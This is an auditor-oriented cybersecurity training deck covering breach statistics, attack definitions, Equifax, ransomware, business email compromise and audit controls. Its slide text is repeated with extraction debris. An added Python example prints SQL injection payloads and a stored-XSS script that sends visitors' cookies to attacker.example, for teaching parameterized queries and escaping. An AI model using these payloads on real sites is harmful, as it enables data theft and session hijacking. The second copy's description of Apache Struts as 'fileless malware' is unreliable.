David Losacco, Principal, mobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett & Associates, stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
AS AUDITORS WHY DO WE CARE
Sources 2018 Global Megatrends in Cybersecurity
• Cyber crime costs are estimated to reach $6 trillion by 2021
• 77% of organizations do not have a formal cybersecurity incident response plan
• 147,900,000 consumer records were impacted by the Equifax breach in 2017; the US population is 327 million
• In the 1st quarter of 2017, 60% of malware payloads were ransomware. By the end of 2018 ransomware accounted for only 5% of malware
• "Fileless" malware attacks increased 432% in 2017
• Cryptojacking attacks increased 8,500% in 2017
Security compromises are a persistent business risk
9
THEY WANT OUR MONEY
Financial gain is still the #1 motive for cyber attacks and breaches, at over 75% in 2017. Espionage and all other motives combined still make up less than 25%
• Personally Identifiable Information (PII) is worth more on the black market ("the Dark Web") than credit card numbers
• Ransomware payments were estimated at over $1 billion in 2017; 70% of ransomware victims paid
• Email scams cost businesses over $12 billion in 2018
• 10% of laundered money is attributable to cyber crime. That number is $200 billion
Source: Verizon Data Breach Investigations Report 2018
10
HOW DO THEY DO IT
Cyber criminals have multiple means to achieve Financial Gain
bull Theft of funds (Bank Accounts)
bull Extortion (Ransomware)
bull Selling of stolen credit cards
bull Selling of PII and PHI data
bull Insider Trading Information
bull Using compromised environment for other attacks or for rent (Cryptojacking)
11
EVER-CHANGING LANDSCAPE
The types of cyber attacks and exploits are changing
• Server attacks, once at 50%, are trending down
• User device and person attacks are both trending upward at nearly the same pace due to malware, ransomware and phishing attacks
COMMON TERMS AND DEFINITIONS
Information Technology (IT): The corporate department that handles the software and hardware that run the normal functions of a typical business or enterprise; the department charged with establishing, monitoring and maintaining information technology systems and services
Operational Technology (OT): The hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise. OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition (SCADA) systems. OT devices and environments are typically run separately from IT departments. These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things (IoT): A computing concept describing everyday physical devices (DVR systems, thermostats, refrigerators, vehicles) being connected to the internet and able to identify themselves to other devices, which enables the devices to collect and exchange data
12
13
ATTACKS IN THE HEADLINES
https://www.businessinsider.com/hackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
https://jsis.washington.edu/news/cyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONS
Bot: A software "robot" that performs an extensive set of automated tasks on its own. Bots can perform destructive tasks as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets
Botnet: A number of Internet-connected devices (e.g., computers, DVR systems and other devices), each running one or more bots after being infected with malware. Botnets can be used to perform Distributed Denial of Service attacks, steal data, send spam and give the attacker access to the device and its connection. Botnets can be rented out to other hackers or cyber criminals
Denial of Service (DoS) and Distributed Denial of Service (DDoS): A type of attack on a network designed to bring the network to its knees by flooding it with useless traffic. A DDoS attack is the same as a DoS attack but involves many computers attacking the network from many locations. Typically the computers being used are members of a botnet
15
ATTACKS IN THE HEADLINES
https://www.csoonline.com/article/3258748/the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internet.html
https://www.wired.com/story/reaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONS
Middleware: Software that facilitates the exchange of data between two application programs within the same environment or across different hardware and network environments. Three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) attack: An attack in which the attacker has placed themselves in the middle of the communications between two parties. The attacker can read or alter the data while both parties believe they are talking directly to each other
SQL Injection and Cross-site Scripting attacks: Attacks in which the attacker feeds malicious input to a website. In SQL injection the input is built into a database query, so the attacker's SQL executes and returns (or modifies) information the site never intended to expose. In cross-site scripting (XSS) the attacker injects script into a page, and the script runs in the browsers of the website's other users
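Added example (not from the deck): the two injection classes defined above, shown side by side in Python against an in-memory SQLite database. The users table, the lookup functions, the comment renderer and the attacker payloads are all constructed for illustration; the point is that the same input is harmless once it is passed as a bound parameter or HTML-escaped.

```python
import html
import sqlite3


def build_db():
    """Constructed sample database: a users table with two hypothetical rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (username, email, is_admin) VALUES (?, ?, ?)",
        [("alice", "alice@example.com", 1), ("bob", "bob@example.com", 0)],
    )
    return conn


def lookup_vulnerable(conn, username):
    """SQL injection: untrusted input is pasted into the query text, so the
    attacker's input becomes part of the SQL the database executes."""
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Parameterized query: the input is bound as a value and can never change
    the structure of the statement, whatever characters it contains."""
    return conn.execute(
        "SELECT username, email FROM users WHERE username = ?", (username,)
    ).fetchall()


def render_comment_vulnerable(comment):
    """Cross-site scripting: user-supplied text is placed into the page as-is,
    so any <script> it contains runs in every other visitor's browser."""
    return "<p>" + comment + "</p>"


def render_comment_safe(comment):
    """Output encoding turns the markup characters into harmless entities."""
    return "<p>" + html.escape(comment, quote=True) + "</p>"


if __name__ == "__main__":
    db = build_db()
    # Tautology payload: the vulnerable lookup returns every user instead of one
    payload = "x' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, payload))
    print("safe:      ", lookup_safe(db, payload))
    # UNION payload: reads the database schema, information the page never meant to expose
    schema_payload = "' UNION SELECT name, sql FROM sqlite_master --"
    print("schema leak:", lookup_vulnerable(db, schema_payload))
    # Stored XSS payload: ships every later visitor's cookie to the attacker
    xss = '<script>document.location="https://attacker.example/?c="+document.cookie</script>'
    print(render_comment_vulnerable(xss))
    print(render_comment_safe(xss))
```

For an auditor the check is not the payload but the pattern: string concatenation of user input into SQL, or of user text into HTML, is the defect; parameter binding and output encoding are the controls to look for in the code or the framework configuration.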
17
ATTACKS IN THE HEADLINES
https://www.zdnet.com/article/man-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
https://krebsonsecurity.com/2018/09/secret-service-warns-of-surge-in-atm-wiretapping-attacks/comment-page-1/
https://www.scmagazine.com/home/security-news/cisco-patches-prime-license-manager-sql-injection-vulnerability
https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONS
Common Vulnerabilities and Exposures (CVE): A catalog of publicly known cybersecurity vulnerabilities, maintained by MITRE and sponsored by the US Department of Homeland Security. Vulnerabilities are known errors in a system or software that give an attacker direct access; exposures are known errors that give an attacker indirect access, which may let the attacker gather knowledge or content. Many of the malware outbreaks and cyber attacks in the news resulted from attackers exploiting a vulnerability that had been known, and fixed by the vendor, for months or years but never patched at the company level
Zero-Day Vulnerability/Attack: An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero-day vulnerabilities are the most difficult to protect against and detect because there is no vendor patch, signature or guidance yet
Advanced Persistent Threat (APT): A set of stealthy and continuous computer hacking processes, often orchestrated by a person or group targeting a specific entity
19
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
• Malware is the typical first foothold used in connection with hacking attempts
• Ransomware is a type of malware that has been in the headlines
• Malware can grant command and control of a device to the attackers
• 1 in 131 emails contained malware in 2016
• "Fileless" malware is a newer variant that is more difficult to detect because it runs in memory or abuses legitimate system tools rather than writing a file to disk for antivirus to scan
20
• The attack started in early March 2017 with hackers using a bot programmed to scan the web for systems exposed to a recently published CVE (Common Vulnerabilities and Exposures entry)
• It took the hackers two months before they found the vulnerability on one of Equifax's websites used to help customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
• The vulnerability was in the Apache Struts web framework (CVE-2017-5638), a framework flaw rather than a piece of malware: the CVE and the vendor patch had been published in March 2017, but the fix was never applied
• Hackers spent an estimated 76 days in the network and downloaded records from 51 different databases
• Over 148 million records were stolen
• The attack was not identified until July 30, 2017
21
In addition to US consumers, the UK Data Protection Authority, the Information Commissioner's Office, reported:
• Approximately 20,000 UK data subjects had names, dates of birth, telephone numbers and driving licence numbers exposed
• More than 600,000 UK data subjects had names, dates of birth and telephone numbers exposed
• Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX - WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONS
Dark Web / Darknet: Websites on the internet that are not accessible by normal search engines or means. Darknet sites require special software such as Tor (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities, such as black-market purchasing of stolen PII or credit card data as well as botnet rentals. Bitcoin is the usual currency on the Dark Web
Bitcoin: A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger (the blockchain) that, along with all Bitcoin transactions, is verified by a massive amount of computing power. Bitcoin mining is the process through which new bitcoins come into circulation: it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward of a few bitcoins. The difficulty of the puzzle adjusts upward as more computing power joins the network
23
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key
• Bitcoin is typically the payment method
• Ransomware attacks were growing at a rate of 350% annually until 2017 and have since dropped, but are still present (HR and healthcare companies were both hit in February)
• The WannaCry ransomware attack impacted over 200,000 systems across 150 countries (it included a worm, so it spread between machines without any user interaction)
24
RANSOMWARE
Ransomware-as-a-Service (RaaS) allows any amateur attacker to get into the business with basic knowledge and less effort. The amateur attacker can visit a RaaS site on the dark web and set up an account to create the ransomware package. It is up to the attacker to distribute the ransomware, while the RaaS operator handles the ransom payments. The RaaS developer takes a cut of any payments that are made, and will reduce their cut depending on the volume of payments received
25
• Business Email Compromise (BEC) is an exploit targeting a company's corporate email accounts and impersonating or "spoofing" the email identity of an employee or company executive in order to fraudulently obtain money or sensitive information from the company, its business partners and/or employees
• The FBI's Internet Crime Complaint Center (IC3) said that, based on fraud reports submitted from October 2013 to May 2018, there were 41,058 US victims of BEC schemes, who collectively lost at least $2.9 billion, while global losses were more than four times that amount (FBI: Global Business Email Compromise Losses Hit $12.5 Billion)
• BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (https://www.sec.gov/litigation/investreport/34-84429.pdf). The report was considered a "highly unusual action" by the SEC and identified nine companies that had been specifically investigated due to a BEC incident
• All nine lost at least $1 million to a BEC scam
• Two companies lost more than $30 million each
• In total the nine issuers lost almost $100 million
BUSINESS EMAIL COMPROMISE (BEC)
26
Phishing: A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment, following the link or giving up credentials
BEC & PHISHING
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
AS AUDITORS WHY DO WE CARE
Sources: 2018 Global Megatrends in Cybersecurity
• 51% of data breaches are caused by organized cyber crime; 18% are caused by nation-states
• 70% of cyber attacks and data breaches go undetected
• 69% of organizations learn of their breach from an outside entity such as law enforcement, customers or suppliers
• In 2017 there were over 130 large-scale targeted breaches in the US per year, and that number is growing by 27 percent per year
• Small and mid-size businesses make up 43% of cyber crime targets
• Cyber crime costs are estimated to reach $6 trillion by 2021
• 77% of organizations do not have a formal cybersecurity incident response plan
• 147,900,000 consumer records were impacted by the Equifax breach in 2017 (the US population is 327 million)
• In the 1st quarter of 2017, 60% of malware payloads were ransomware; by the end of 2018 ransomware accounted for only 5% of malware
• "Fileless" malware attacks increased 432% in 2017
• Cryptojacking attacks increased 8,500% in 2017
Security compromises are a persistent business risk.
THEY WANT OUR MONEY
Financial gain is still the #1 factor for cyber attacks and breaches, at over 75% in 2017. Espionage and other factors combined still make up less than 25%.
• Personally Identifiable Information (PII) is worth more on the black market ("The Dark Web") than credit card numbers
• Ransomware payments were estimated at over $1 billion in 2017; 70% of all ransomware was paid
• Email scams cost businesses over $12 billion in 2018
• 10% of laundered money is attributable to cyber crime. That number is $200 billion
Source: Verizon Data Breach Investigations Report 2018
HOW DO THEY DO IT
Cyber criminals have multiple means to achieve financial gain:
• Theft of funds (bank accounts)
• Extortion (ransomware)
• Selling of stolen credit cards
• Selling of PII and PHI data
• Insider trading information
• Using a compromised environment for other attacks or for rent (cryptojacking)
EVERCHANGING LANDSCAPE
The types of cyber attacks and exploits are changing:
• Server attacks, once at 50%, are trending down
• User device and person attacks are both trending upward at nearly the same pace due to malware, ransomware and phishing attacks
COMMON TERMS AND DEFINITIONS
Information Technology (IT) – The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise: the department within a company that is charged with establishing, monitoring and maintaining information technology systems and services.
Operational Technology (OT) – The hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise. OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition (SCADA) systems. OT devices and environments are typically run separately from IT departments. These are the devices that communicate with pipelines and electrical grids (and nuclear power plants).
Internet of Things – A computing concept that describes the idea of everyday physical devices (DVR systems, thermostats, refrigerators, vehicles) being connected to the internet and being able to identify themselves to other devices, which enables the devices to collect and exchange data.
ATTACKS IN THE HEADLINES
https://www.businessinsider.com/hackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
https://jsis.washington.edu/news/cyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks/
COMMON TERMS AND DEFINITIONS
Bot – A bot is a software "robot" that performs an extensive set of automated tasks on its own. Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets.
Botnet – A number of Internet-connected devices (e.g. computers, DVR systems and other devices) that have been infected with malware, each of which is running one or more bots. Botnets can be used to perform Distributed Denial of Service attacks, steal data, send spam and allow the attacker access to the device and its connection. Botnets can be rented out to other hackers or cyber criminals.
Denial of Service (DoS) and Distributed Denial of Service – A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. A Distributed DoS is the same as a DoS attack but involves multiple computers attacking the network from multiple locations. Typically the computers being used are infected with botnet malware.
ATTACKS IN THE HEADLINES
https://www.csoonline.com/article/3258748/the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internet.html
https://www.wired.com/story/reaper-iot-botnet-infected-million-networks/
COMMON TERMS AND DEFINITIONS
Middleware – Software that facilitates the exchange of data between two application programs within the same environment or across different hardware and network environments. Three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware.
Man-in-the-Middle (MITM) Attacks – An attack in which the attacker has been able to place themselves in the middle of communications between two parties. The attacker is able to alter or obtain data for themselves while unknown to the other two parties.
SQL Injection and Cross-site Scripting Attacks – An attack in which the attacker injects malicious code into a website. In SQL Injection the attacker uses the SQL language to obtain information back from the website that was unintended. In Cross-site Scripting the attacker injects code that only impacts other users of the website.
ATTACKS IN THE HEADLINES
https://www.zdnet.com/article/man-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable/
https://krebsonsecurity.com/2018/09/secret-service-warns-of-surge-in-atm-wiretapping-attacks/comment-page-1/
https://www.scmagazine.com/home/security-news/cisco-patches-prime-license-manager-sql-injection-vulnerability/
https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions/
COMMON TERMS AND DEFINITIONS
Common Vulnerabilities and Exposures (CVE) – Catalog sponsored by Homeland Security that documents known cyber threats. Vulnerabilities are known errors in a system or software that provide an attacker with direct access. Exposures are known errors that allow an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level.
Zero Day Vulnerability/Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by the vendor.
Advanced Persistent Threat – A set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity.
MALWARE
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts
• Ransomware is a version of malware that has been in the headlines
• Malware can grant command and control of a device to the hackers
• 1 in 131 emails contained malware in 2016
• "Fileless" malware is a new variant that is more difficult to detect
COMPLEXITY BEHIND THE EQUIFAX ATTACK
• The attack started in early March 2017 with hackers using a bot programmed to search the web for a recently released CVE (Common Vulnerability and Exposure)
• It took the hackers two months before they found the vulnerability on one of Equifax's websites used to help customers with claims
• Hackers then used another vulnerability (a fileless malware named Apache Struts) that was also a CVE that had been issued a month before but never fixed
• Hackers spent an estimated 76 days in the network and downloaded records from 51 different databases
• Over 148 million records were stolen
• The attack was not identified until July 30, 2017
EQUIFAX – WHAT WAS LOST
In addition to US consumers, the UK Data Protection Authority, the Information Commissioner's Office, reported:
• Approximately 20,000 UK data subjects had names, dates of birth, telephone numbers and driving license numbers exposed
• More than 600,000 UK data subjects had names, dates of birth and telephone numbers exposed
• Up to 15 million UK data subjects had names and dates of birth exposed
COMMON TERMS AND DEFINITIONS
Dark Web / Darknet – Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or credit card data as well as botnet rentals. Bitcoins are traded on the Dark Web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that, along with all Bitcoin transactions, is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released to come into circulation; it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process, that is the amount of computing power involved, increases.
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key.
• The use of bitcoins is typically the payment method
• Ransomware attacks were growing at a rate of 350% annually until 2017 and have now dropped but are still present (HR and healthcare companies both in February)
• The WannaCry ransomware attack impacted over 200,000 people across 150 countries (it included a worm)
RANSOMWARE
Ransomware-as-a-Service (RaaS) allows any amateur attacker to get into the business with basic knowledge and less effort. The amateur attacker can visit a RaaS site on the dark web and set up an account to create the ransomware package. It is up to the attacker to distribute the ransomware, while the RaaS will handle the ransom payments. The RaaS developer takes a cut of any payments that are made. The developer will also reduce their cut depending on the volume of payments received.
BUSINESS EMAIL COMPROMISE (BEC)
• Business Email Compromise (BEC) is an exploit targeting a company's corporate email accounts and impersonating or "spoofing" the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company, its business partners and/or employees
• The FBI's Internet Crime Complaint Center, or IC3, said that based on fraud reports submitted from October 2013 to May 2018 there were 41,058 total US victims of BEC schemes, which collectively lost at least $2.9 billion, while global losses were more than four times that amount (FBI: Global Business Email Compromise Losses Hit $12.5 Billion)
• BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (https://www.sec.gov/litigation/investreport/34-84429.pdf). The report was considered a "highly unusual action" by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
• All nine lost at least $1 million due to BEC scams
• Two companies lost more than $30 million each
• In total the nine issuers lost almost $100 million
BEC & PHISHING
Phishing – A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment.
Spear Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include cloning (using a previous legitimate email) and whaling (attacking a high-level executive).
• CEO email to Treasurer
• HR phishing for employee data
• W-2 phishing data (the IRS sent out a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
PHISHING EMAIL EXAMPLE
Most companies battle the increased phishing and spear-phishing attacks by labeling each external email with some form of the following inserts: [example image]
This "band-aid" is still widely in practice today, however
BEC & OFFICE 365
• Office 365 is Microsoft's cloud-based solution offering everything from email and Excel to cloud storage
• Microsoft Office 365 is now in use at over 70% of Fortune 500 companies
• 20% of all companies use Office 365
• Office 365 overtook Office products in the 4th quarter of 2017 as the largest revenue stream for Microsoft
• Most companies do not correctly set up Office 365 security or logging
• There has been a significant increase in attack vectors against Office 365
• It only takes one employee and the hacker is internal to email and Office 365
• Some attack vectors do not require a phishing email
BEC ATTACK WALKTHROUGH (diagram)
BEC – PROTECT YOUR CASH
Accounting controls at all entry/exit points for cash:
Cash Receipts
• Review of balances over 60 days and $10k – a triggered review and communication uncovered a change in bank info (communication was being sent to a deleted email)
• Reports that generate overdue receivables timely for follow-up
• Elevation rules for overdue receivables
Cash Disbursements
• SOD – limit access to the vendor master file
• Controls related to changing bank info for all vendors – need more than email communication; personal verification with the vendor requesting the change
• Vendor set-up – verification of information provided
• ISNetworld – vetting process for vendors; could require vetting prior to set-up as vendors
• ACH debits – no reason to give debit access to the account; if done, dual approval and a ZBA should be used
• Multi-factor authentication
Other Processes to Consider: Treasury, Payroll, Royalties, SOX Impact, Cyber Insurance, Legal Liabilities, Contract Language
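The two cash controls on this slide, expressed as checks an auditor could run over AR and AP extracts. This is an added example written for this page, not code from the presentation or from Stinnett & Associates; the 60-day / $10k trigger, callback verification, dual approval and SOD rule come from the slide, while the invoice data, request fields and names are constructed.

```python
"""Added example, not from the presentation: the cash receipts review trigger
and the vendor bank-change controls as runnable checks. Thresholds are the
slide's; invoices, requests and approver names are constructed."""
from dataclasses import dataclass
from datetime import date

OVERDUE_DAYS = 60       # slide: balances over 60 days ...
OVERDUE_AMOUNT = 10_000  # ... and over $10k trigger a review


@dataclass(frozen=True)
class Invoice:
    customer: str
    amount: float
    due: date


def receivables_to_review(invoices, today):
    """Cash receipts: balances both over 60 days and over $10k trigger a review.
    The follow-up should be a call to the number already on file, not a reply on
    the same email thread, since a diverted remittance is exactly what is suspected."""
    return [inv for inv in invoices
            if (today - inv.due).days > OVERDUE_DAYS and inv.amount > OVERDUE_AMOUNT]


@dataclass(frozen=True)
class BankChangeRequest:
    vendor: str
    callback_verified: bool          # confirmed by phone to the number already on file
    approvers: tuple                 # people who approved the change
    requester_can_edit_master: bool  # SOD: the requester must not own the vendor master


def bank_change_allowed(req):
    """Cash disbursements: an email alone never suffices to change vendor bank
    details. Returns (allowed, reasons) so each failed control is reportable."""
    reasons = []
    if not req.callback_verified:
        reasons.append("no personal verification with the vendor")
    if len(set(req.approvers)) < 2:
        reasons.append("dual approval missing")
    if req.requester_can_edit_master:
        reasons.append("requester has vendor master edit rights (SOD)")
    return (not reasons, reasons)


# Constructed sample data, not real customers or vendors.
AS_OF = date(2019, 2, 1)
INVOICES = [
    Invoice("Acme Pipe", 15_000.00, date(2018, 11, 1)),  # 92 days overdue, over $10k
    Invoice("Bolt Co", 5_000.00, date(2018, 10, 1)),     # old, but under $10k
    Invoice("Crane LLC", 20_000.00, date(2019, 1, 15)),  # large, but only 17 days
]
REQUESTS = [
    # email-only request, same person approved twice, requester owns the master
    BankChangeRequest("Acme Pipe", False, ("ap.clerk", "ap.clerk"), True),
    # verified by callback, two distinct approvers, requester has no master access
    BankChangeRequest("Bolt Co", True, ("ap.clerk", "controller"), False),
]


def sample_checks():
    """Returns (customers to review, {vendor: reasons the change is blocked})."""
    review = [inv.customer for inv in receivables_to_review(INVOICES, AS_OF)]
    blocked = {}
    for req in REQUESTS:
        allowed, reasons = bank_change_allowed(req)
        if not allowed:
            blocked[req.vendor] = reasons
    return review, blocked


if __name__ == "__main__":
    review, blocked = sample_checks()
    print("receivables to review:", review)
    for vendor, reasons in blocked.items():
        print(f"bank change for {vendor} blocked: {'; '.join(reasons)}")
```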
AND MULTI-FACTOR AUTHENTICATION
• Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical security keys in place of passwords and one-time codes
• Office 365 and other cloud-based services should all use multi-factor authentication
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach.
The main reasons for companies' struggles are:
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovations in technology
• Expansion of the attack surface
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
DEFENSE IN-DEPTH APPROACH
A Defense-in-Depth approach to cybersecurity is a layered approach that recognizes a company's first line of defense may fail and integrates multiple layers of defense around a company's information assets. Also called the Castle Approach (once you breach the walls, more defenses are in place).
CYBERSECURITY DEFENSE IN-DEPTH
Layers to evaluate:
• Patch Management
• Network Vulnerability Scanning
• Internal & External Network Boundaries
• Firewall Implementation and Monitoring (including NextGen)
• Firewall Dataflow & Standards Documentation
• Security Incident Management
• Evaluation of Encryption Technologies
• Workstation Endpoint Protection
• Operating System EOL
• Security Staffing
• Wireless Security
• IPS / IDS / SIEM Implementations
• Cloud Service Provider Evaluations
• Physical Security
• Network Access Control
People, Technology, Processes
THE PEOPLE CHALLENGE – Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE – The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE – Ensure best practice processes and associated management frameworks are in place. Regular audits and reviews are important.
WHERE AUDIT CAN HELP
Step 1 - Identify risks through a formal risk assessment of assets
Step 2 - Perform a baseline gap analysis of the current control environment against industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
Cycle: Risk Assessments → Create a Baseline / Gap Analysis → Implement and Manage Controls → Assess & Report
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Perform risk assessments to understand the organizational risk and where high-risk assets exist
• The risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event
• Consider using a threat modeling tool to semi-qualitatively measure cybersecurity risks, to identify, estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results
Key to an effective cybersecurity program is to understand the Company's information assets:
• What value do the assets have?
• Credit card data
• Employee or customer records
• Bank accounts
• Intellectual property
• Trade secrets
• Insider knowledge
• Data location
• Cash in / cash out processes
• Who would want the data?
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Through formal risk assessments with all critical functions in the business, identify where data lives and how the data should be classified, then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine the critical data assets in your environment that are most at risk of a cybersecurity incident
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
[Example screenshot of a critical data asset risk assessment]
STEP 2 - BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
• Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement, including the highest priority, most impactful controls that should be implemented first
STEP 3 - CONTROLS ANALYSIS
• The Baseline Gap Analysis facilitates the identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
• Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
[Chart: Mitigating Control Counts]
A) Identify information systems with a calculated cybersecurity risk > 100
B) Does the information system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes/No)? If yes, move to the next step
C) Identified mitigating controls to implement to mitigate the threat
D) Totaled all instances where controls reduced risk
